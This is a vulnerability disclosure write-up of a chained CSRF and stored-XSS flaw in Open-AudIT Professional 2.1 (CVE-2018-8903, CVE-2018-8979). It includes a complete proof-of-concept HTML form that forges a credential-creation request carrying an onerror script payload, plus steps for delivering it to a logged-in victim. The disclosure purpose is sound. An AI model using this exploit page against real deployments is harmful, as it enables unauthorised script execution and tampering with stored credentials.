CSRF to XSS - Open-AudIT Professional 2.1

Hi All,

Recently, during one of my pentest research engagements, I came across Open-AudIT Professional 2.1.

Open-AudIT is a network auditing application built on PHP, Bash and VBScript. It can tell you what is on your network, how it is configured and whether anything has changed.

Curious to explore its functionalities, I downloaded and set it up in my local system.

After going through the source code, I found that it had neither CSRF protection nor cross-site scripting (XSS) protection, and that it accepted arbitrary user input without sanitisation. So I decided to chain the two vulnerabilities together: CSRF to XSS.

  • Title of the Vulnerability: CSRF to XSS
  • Vulnerability Class: XSS and CSRF
  • Technical Details & Description: The credential-creation request (POST to /omk/open-audit/credentials) carries no anti-CSRF token, so a logged-in user who opens an attacker-controlled page submits it without knowing. The Name and Description fields of a credential are stored and rendered without HTML encoding, so a payload planted through CSRF executes as stored XSS for every user who views the Credentials page.
  • CVE IDs allocated:
    1. CVE-2018-8903 - Stored XSS
    2. CVE-2018-8979 - Cross-Site Request Forgery (CSRF)
  • Product & Service Introduction: Open-AudIT Professional 2.1

Observation :- [CSRF to XSS]

When you log in to Open-AudIT Professional 2.1 and create a credential (Home ==> Credentials), you will notice that the request has no protection against CSRF: the form carries no anti-CSRF token, so any site the user visits can submit it on their behalf.



Digging deeper into the source code, I also noticed that there is no XSS protection on the Name and Description parameters: whatever is submitted is stored and displayed as-is.




The next step was to chain the two bugs together.


Step 1 :- Craft an HTML page with the XSS payload in it.

<html>
  <body>
  <!-- Replace the PoC page's URL in the address bar before the form is sent -->
  <script>history.pushState('', '', '/')</script>
    <!-- Field names are HTML-entity encoded (&#91; is "[", &#93; is "]", &#95; is "_").
         The browser decodes them, so the server receives the same
         data[attributes][name], data[attributes][org_id], ... parameters the
         real Create Credentials form posts. No anti-CSRF token is needed. -->
    <form action="http://localhost/omk/open-audit/credentials" method="POST">
      <!-- The stored XSS payload goes into the unescaped Name field -->
      <input type="hidden" name="data&#91;attributes&#93;&#91;name&#93;" value="<img src=x onerror=alert('hacked');>" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;org&#95;id&#93;" value="1" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;description&#93;" value="CSRF" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;type&#93;" value="ssh" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;username&#93;" value="test" />
      <input type="hidden" name="data&#91;attributes&#93;&#91;credentials&#93;&#91;password&#93;" value="test" />
      <input type="hidden" name="data&#91;type&#93;" value="credentials" />
      <input type="hidden" name="submit" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


Step 2 :- Save this as an .html file and send it to the victim (the victim must be logged in to Open-AudIT in the same browser). As written, the page still needs the victim to press the Submit button; an attacker would normally auto-submit the form with a script so that no click is required.

A new entry containing your XSS payload will be added under Credentials.



The XSS fires for any user who visits the Credentials page:
http://localhost/omk/open-audit/credentials

Video POC  for CSRF to XSS :-  





Conclusion :-

The main aim of this article is to show that POST-based XSS should not be dismissed as hard to exploit: when the vulnerable request can also be forged, the attacker needs no account of their own to plant the payload. I also hope it gives you some ideas of how combining attacks can make them much more potent.
